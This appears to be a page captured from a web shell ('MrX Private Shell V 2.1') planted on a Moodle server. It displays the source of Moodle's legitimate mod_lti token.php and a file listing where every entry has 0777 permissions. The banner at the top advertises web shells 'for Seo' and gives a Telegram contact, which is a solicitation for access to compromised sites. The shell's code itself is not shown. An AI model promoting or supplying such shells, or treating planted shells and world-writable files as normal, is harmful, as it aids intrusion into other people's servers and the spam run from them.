__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle. If not, see <http://www.gnu.org/licenses/>.
/**
* This file contains a service for issuing access tokens
*
* @package mod_lti
* @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com}
* @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
*/
define('NO_DEBUG_DISPLAY', true);
define('NO_MOODLE_COOKIES', true);
use Firebase\JWT\JWT;
require_once(__DIR__ . '/../../config.php');
require_once($CFG->dirroot . '/mod/lti/locallib.php');
$response = new \mod_lti\local\ltiservice\response();
$contenttype = isset($_SERVER['CONTENT_TYPE']) ? explode(';', $_SERVER['CONTENT_TYPE'], 2)[0] : '';
$ok = ($_SERVER['REQUEST_METHOD'] === 'POST') && ($contenttype === 'application/x-www-form-urlencoded');
$error = 'invalid_request';
$clientassertion = optional_param('client_assertion', '', PARAM_TEXT);
$clientassertiontype = optional_param('client_assertion_type', '', PARAM_TEXT);
$granttype = optional_param('grant_type', '', PARAM_TEXT);
$scope = optional_param('scope', '', PARAM_TEXT);
if ($ok) {
$ok = !empty($clientassertion) && !empty($clientassertiontype) &&
!empty($granttype) && !empty($scope);
}
if ($ok) {
$ok = ($clientassertiontype === 'urn:ietf:params:oauth:client-assertion-type:jwt-bearer') &&
($granttype === 'client_credentials');
$error = 'unsupported_grant_type';
}
if ($ok) {
$parts = explode('.', $clientassertion);
$ok = (count($parts) === 3);
if ($ok) {
$payload = JWT::urlsafeB64Decode($parts[1]);
$claims = json_decode($payload, true);
$ok = !is_null($claims) && !empty($claims['sub']);
}
$error = 'invalid_request';
}
if ($ok) {
$tool = $DB->get_record('lti_types', array('clientid' => $claims['sub']));
if ($tool) {
try {
lti_verify_jwt_signature($tool->id, $claims['sub'], $clientassertion);
$ok = true;
} catch (Exception $e) {
$error = $e->getMessage();
$ok = false;
}
} else {
$error = 'invalid_client';
$ok = false;
}
}
if ($ok) {
$scopes = array();
$requestedscopes = explode(' ', $scope);
$typeconfig = lti_get_type_config($tool->id);
$permittedscopes = lti_get_permitted_service_scopes($tool, $typeconfig);
$scopes = array_intersect($requestedscopes, $permittedscopes);
$ok = !empty($scopes);
$error = 'invalid_scope';
}
if ($ok) {
$token = lti_new_access_token($tool->id, $scopes);
$expiry = LTI_ACCESS_TOKEN_LIFE;
$permittedscopes = implode(' ', $scopes);
$body = <<< EOD
{
"access_token" : "{$token->token}",
"token_type" : "Bearer",
"expires_in" : {$expiry},
"scope" : "{$permittedscopes}"
}
EOD;
} else {
$response->set_code(400);
$body = <<< EOD
{
"error" : "{$error}"
}
EOD;
}
$response->set_body($body);
$response->send();| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| amd | Folder | 0777 |
|
|
| backup | Folder | 0777 |
|
|
| classes | Folder | 0777 |
|
|
| db | Folder | 0777 |
|
|
| lang | Folder | 0777 |
|
|
| pix | Folder | 0777 |
|
|
| service | Folder | 0777 |
|
|
| source | Folder | 0777 |
|
|
| templates | Folder | 0777 |
|
|
| tests | Folder | 0777 |
|
|
| OAuth.php | File | 29.62 KB | 0777 |
|
| OAuthBody.php | File | 5.41 KB | 0777 |
|
| TrivialStore.php | File | 4.87 KB | 0777 |
|
| auth.php | File | 6.06 KB | 0777 |
|
| certs.php | File | 1.16 KB | 0777 |
|
| contentitem.php | File | 2.43 KB | 0777 |
|
| contentitem_return.php | File | 3.75 KB | 0777 |
|
| coursetooledit.php | File | 3.23 KB | 0777 |
|
| coursetools.php | File | 2.18 KB | 0777 |
|
| deprecatedlib.php | File | 1.1 KB | 0777 |
|
| edit_form.php | File | 21.81 KB | 0777 |
|
| externalregistrationreturn.php | File | 2.31 KB | 0777 |
|
| grade.php | File | 1.36 KB | 0777 |
|
| index.php | File | 4.46 KB | 0777 |
|
| launch.php | File | 4.31 KB | 0777 |
|
| lib.php | File | 25.84 KB | 0777 |
|
| locallib.php | File | 159.29 KB | 0777 |
|
| mod_form.php | File | 29.14 KB | 0777 |
|
| openid-configuration.php | File | 2.66 KB | 0777 |
|
| openid-registration.php | File | 3.46 KB | 0777 |
|
| register.php | File | 4.37 KB | 0777 |
|
| register_form.php | File | 4.33 KB | 0777 |
|
| registersettings.php | File | 3.15 KB | 0777 |
|
| registration.php | File | 1.4 KB | 0777 |
|
| registrationreturn.php | File | 3.47 KB | 0777 |
|
| request_tool.php | File | 2.57 KB | 0777 |
|
| return.php | File | 4.63 KB | 0777 |
|
| service.php | File | 7.34 KB | 0777 |
|
| servicelib.php | File | 9.89 KB | 0777 |
|
| services.php | File | 3.01 KB | 0777 |
|
| settings.php | File | 8.03 KB | 0777 |
|
| startltiadvregistration.php | File | 2.95 KB | 0777 |
|
| styles.css | File | 9.38 KB | 0777 |
|
| token.php | File | 3.42 KB | 0777 |
|
| toolconfigure.php | File | 2.06 KB | 0777 |
|
| toolproxies.php | File | 6.37 KB | 0777 |
|
| toolssettings.php | File | 3.79 KB | 0777 |
|
| typessettings.php | File | 6.26 KB | 0777 |
|
| upgrade.txt | File | 4.91 KB | 0777 |
|
| upgradelib.php | File | 2.08 KB | 0777 |
|
| version.php | File | 2.58 KB | 0777 |
|
| view.php | File | 8.5 KB | 0777 |
|